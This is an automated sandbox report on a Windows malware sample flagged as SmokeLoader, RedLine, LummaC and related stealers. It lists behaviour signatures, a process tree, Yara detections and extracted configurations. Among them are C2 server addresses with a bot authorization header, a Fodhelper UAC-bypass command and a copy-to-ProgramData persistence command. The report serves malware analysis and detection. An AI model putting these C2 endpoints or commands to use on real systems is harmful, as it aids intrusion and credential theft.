Edit tour

Windows Analysis Report
W73PCbSH71.exe

Overview

General Information

Sample name:	W73PCbSH71.exe renamed because original name is a hash value
Original sample name:	c8159fa89113ec6fc180ccb76ff3bdc6.exe
Analysis ID:	1367440
MD5:	c8159fa89113ec6fc180ccb76ff3bdc6
SHA1:	b7790fa8855c67a1b441b964910e2f1857a79c78
SHA256:	bdf0d0149ee88a4b66f6535e6049fa2faf1351a69c7df0146b1fe6964e9c4ad6
Tags:	exeRedLineStealer
Infos:

Detection

LummaC, Glupteba, LummaC Stealer, Petite Virus, RHADAMANTHYS, RedLine, SmokeLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

System process connects to network (likely due to code injection or exploit)

UAC bypass detected (Fodhelper)

Yara detected AntiVM3

Yara detected Glupteba

Yara detected LummaC Stealer

Yara detected Petite Virus

Yara detected RHADAMANTHYS Stealer

Yara detected RedLine Stealer

Yara detected SmokeLoader

Yara detected Stealc

Yara detected zgRAT

.NET source code references suspicious native API functions

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Creates an undocumented autostart registry key

Deletes itself after installation

Drops PE files to the startup folder

Drops large PE files

Found Tor onion address

Found many strings related to Crypto-Wallets (likely being stolen)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Hides threads from debuggers

Infects executable files (exe, dll, sys, html)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Maps a DLL or memory area into another process

PE file contains section with special chars

PE file has a writeable .text section

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses process hollowing technique

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses ping.exe to check the status of other devices and networks

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (date check)

Found evasive API chain (may stop execution after checking a module file name)

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

PE file does not import any functions

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the product ID of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Searches for user specific document files

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

W73PCbSH71.exe (PID: 2476 cmdline: C:\Users\user\Desktop\W73PCbSH71.exe MD5: C8159FA89113EC6FC180CCB76FF3BDC6)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

907.exe (PID: 4284 cmdline: C:\Users\user\AppData\Local\Temp\907.exe MD5: 1713300BA962C869477E37E4B31E40AF)

RegSvcs.exe (PID: 6720 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 6840 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

3613.exe (PID: 4420 cmdline: C:\Users\user\AppData\Local\Temp\3613.exe MD5: ED2FD5173AF900C56220101CE6648515)

InstallSetup8.exe (PID: 4048 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe" MD5: 31F42479194700F598C22EA83FA196C1)

InstallSetup8.exe (PID: 352 cmdline: "C:\Users\user\AppData\Local\Temp\InstallSetup8.exe" MD5: 31F42479194700F598C22EA83FA196C1)

BroomSetup.exe (PID: 4348 cmdline: C:\Users\user\AppData\Local\Temp\BroomSetup.exe MD5: 00E93456AA5BCF9F60F84B0C0760A212)

nsi4BEF.tmp.exe (PID: 7320 cmdline: C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe MD5: F2AD59753E17F68CF6F6F251E0D4DEEC)

toolspub2.exe (PID: 4628 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 2D24E3BAA2A16E47BEE10E91381E6391)

toolspub2.exe (PID: 916 cmdline: "C:\Users\user\AppData\Local\Temp\toolspub2.exe" MD5: 2D24E3BAA2A16E47BEE10E91381E6391)

31839b57a4f11171d6abc8bbc4451ee4.exe (PID: 6508 cmdline: "C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe" MD5: 1E40D9A53D79AA807EB8AF132F417E53)

cmd.exe (PID: 7812 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tuc4.exe (PID: 2792 cmdline: "C:\Users\user\AppData\Local\Temp\tuc4.exe" MD5: 69CF42BBFE7778CE5D750AA4B51AAD9D)

tuc4.tmp (PID: 3052 cmdline: "C:\Users\user\AppData\Local\Temp\is-5MF81.tmp\tuc4.tmp" /SL5="$40060,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" MD5: A7662827ECAEB4FC68334F6B8791B917)

tuc4.exe (PID: 7260 cmdline: "C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060 MD5: 69CF42BBFE7778CE5D750AA4B51AAD9D)

tuc4.tmp (PID: 7292 cmdline: "C:\Users\user\AppData\Local\Temp\is-OKLT8.tmp\tuc4.tmp" /SL5="$10526,7884275,54272,C:\Users\user\AppData\Local\Temp\tuc4.exe" /SPAWNWND=$104BA /NOTIFYWND=$40060 MD5: A7662827ECAEB4FC68334F6B8791B917)

net.exe (PID: 7968 cmdline: "C:\Windows\system32\net.exe" helpmsg 23 MD5: 31890A7DE89936F922D44D677F681A7F)

conhost.exe (PID: 8012 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

etopt.exe (PID: 6064 cmdline: "C:\Users\user\AppData\Local\Temp\etopt.exe" MD5: F77ABC2F79780428CA514C0041C8B9E9)

etopt.exe (PID: 7196 cmdline: "C:\Users\user\AppData\Local\Temp\etopt.exe" MD5: F77ABC2F79780428CA514C0041C8B9E9)

3FF8.exe (PID: 1888 cmdline: C:\Users\user\AppData\Local\Temp\3FF8.exe MD5: 1A344159928228AF15C9BD838C73E319)

conhost.exe (PID: 7068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)

4BEF.exe (PID: 7284 cmdline: C:\Users\user\AppData\Local\Temp\4BEF.exe MD5: 04F93F610DF4D1C941EC7F64679E3039)

RegSvcs.exe (PID: 7520 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7544 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

5A58.exe (PID: 7380 cmdline: C:\Users\user\AppData\Local\Temp\5A58.exe MD5: 700A9938D0FCFF91DF12CBEFE7435C88)

617D.exe (PID: 7416 cmdline: C:\Users\user\AppData\Local\Temp\617D.exe MD5: 1A28322108062B67D4248CBFE145DEBF)

dialer.exe (PID: 7536 cmdline: C:\Windows\system32\dialer.exe MD5: B2626BDCF079C6516FC016AC5646DF93)

7D14.exe (PID: 7608 cmdline: C:\Users\user\AppData\Local\Temp\7D14.exe MD5: 460167998760122937411C5191649DBA)

9234.exe (PID: 7700 cmdline: C:\Users\user\AppData\Local\Temp\9234.exe MD5: 9C815131562310CCECBBE81C49E57029)

cmd.exe (PID: 7796 cmdline: "C:\Windows\System32\cmd.exe" /c copy "C:\Users\user\AppData\Local\Temp\9234.exe" "C:\ProgramData\xQfUeydaBrjuHptx.exe" && ping 1.1.1.1 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PING.EXE (PID: 7872 cmdline: ping 1.1.1.1 MD5: 2F46799D79D22AC72C241EC0322B011D)

A203.exe (PID: 7752 cmdline: C:\Users\user\AppData\Local\Temp\A203.exe MD5: 246EB9F40EF75F048C065DE2F8903289)

ABF7.exe (PID: 7832 cmdline: C:\Users\user\AppData\Local\Temp\ABF7.exe MD5: 2E5700376F42724B69E46594A77BC47A)

conhost.exe (PID: 7860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jfhrjta (PID: 2260 cmdline: C:\Users\user\AppData\Roaming\jfhrjta MD5: C8159FA89113EC6FC180CCB76FF3BDC6)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://darktrace.com/blog/the-rise-of-the-lumma-info-stealer https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-lummac2-94111d4b1e11 https://medium.com/s2wblog/lumma-stealer-targets-youtubers-via-spear-phishing-email-ade740d486f7	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Glupteba	Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.	No Attribution	http://resources.infosecinstitute.com/tdss4-part-1/ https://blog.chainalysis.com/reports/2022-crypto-crime-report-preview-malware/ https://blog.google/technology/safety-security/new-action-combat-cyber-crime/ https://blog.google/threat-analysis-group/disrupting-glupteba-operation/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/	https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/ https://bartblaze.blogspot.com/2021/06/digital-artists-targeted-in-redline.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: StealC

{"C2 url": "http://5.42.66.58/3886d2276f6914c4.php"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://185.215.113.68/fks/index.php", "http://185.215.113.68/fks/index.php"]}

Threatname: RedLine

{"C2 url": "195.20.16.103:18305", "Bot Id": "666", "Authorization Header": "6a285b1c7a795c394e7d6aadc56f52aa"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
W73PCbSH71.exe	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security

PCAP (Network Traffic)

Source	Rule	Description	Author
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OI81K.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-7DQAC.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PTF13.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-62HR3.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Users\user\AppData\Roaming\jfhrjta	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L2GUL.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-ER2T6.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-KOPPR.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TFV9B.tmp	JoeSecurity_PetiteVirus	Yara detected Petite Virus	Joe Security
C:\Users\user\AppData\Local\Temp\A203.exe	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\907.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
Click to see the 6 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000025.00000002.3048629503.000000001C110000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1687909281.00000000001F0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000026.00000000.2233055154.0000000000482000.00000002.00000001.01000000.00000022.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000008.00000002.3177470933.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000024.00000002.2623549730.00000000034D3000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1925341423.00000000001E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x5e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000003.00000002.1925621429.00000000004E1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2100813510.00000000004A1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000006.00000002.1919407201.00000000045B9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000002.2342467116.0000000000843000.00000040.00000001.01000000.0000000C.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000006.00000002.1919407201.0000000004CCD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1688011276.00000000004F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x1e4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000022.00000003.2209743343.000001B8F65F0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000022.00000003.2203687364.000001B8F6310000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
0000001E.00000003.2191639090.0000000000950000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000026.00000002.2657468716.0000000002884000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0000000F.00000003.2047877802.0000000003B02000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000011.00000002.2100651927.0000000000470000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x6f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
0000000E.00000002.2053247085.000000000058C000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1410:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000010.00000000.2046828797.0000000000401000.00000020.00000001.01000000.0000000D.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000000F.00000002.2416198321.00000000029D5000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000000F.00000002.2430493808.0000000003213000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
00000022.00000003.2177329422.000001B8F3EC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000002.1919407201.0000000004D3A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000020.00000002.2218763067.000000001BD11000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000025.00000002.2797802024.0000000002D21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000002A.00000003.2674601297.00000000011AB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000025.00000002.3065308983.000000001C540000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: 907.exe PID: 4284	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegSvcs.exe PID: 6840	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: 31839b57a4f11171d6abc8bbc4451ee4.exe PID: 6508	JoeSecurity_Glupteba	Yara detected Glupteba	Joe Security
Process Memory Space: RegAsm.exe PID: 564	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 564	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 4BEF.exe PID: 7284	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: 5A58.exe PID: 7380	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: 5A58.exe PID: 7380	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: dialer.exe PID: 7536	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 43 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.jfhrjta.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
38.0.A203.exe.480000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
6.2.907.exe.4d3b620.6.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
17.2.toolspub2.exe.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
14.2.toolspub2.exe.5515a0.1.raw.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
6.2.907.exe.4d047f0.5.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
36.2.7D14.exe.330000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
36.2.7D14.exe.330000.0.unpack	MALWARE_Win_zgRAT	Detects zgRAT	ditekSHen	0x2bee9:$s1: file:/// 0x2be45:$s2: {11111-22222-10009-11112} 0x2be79:$s3: {11111-22222-50001-00000} 0x29506:$s4: get_Module 0x26e9d:$s5: Reverse 0x2aeab:$s6: BlockCopy 0x2ae4c:$s7: ReadByte 0x2befb:$s8: 4C 00 6F 00 63 00 61 00 74 00 69 00 6F 00 6E 00 00 0B 46 00 69 00 6E 00 64 00 20 00 00 13 52 00 65 00 73 00 6F 00 75 00 72 00 63 00 65 00 41 00 00 11 56 00 69 00 72 00 74 00 75 00 61 00 6C 00 ...
34.3.dialer.exe.1b8f6310000.4.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
37.2.9234.exe.1c552b80.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.jfhrjta.400000.0.unpack	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
30.3.nsi4BEF.tmp.exe.950000.0.raw.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
6.0.907.exe.c30000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.0.907.exe.c30000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
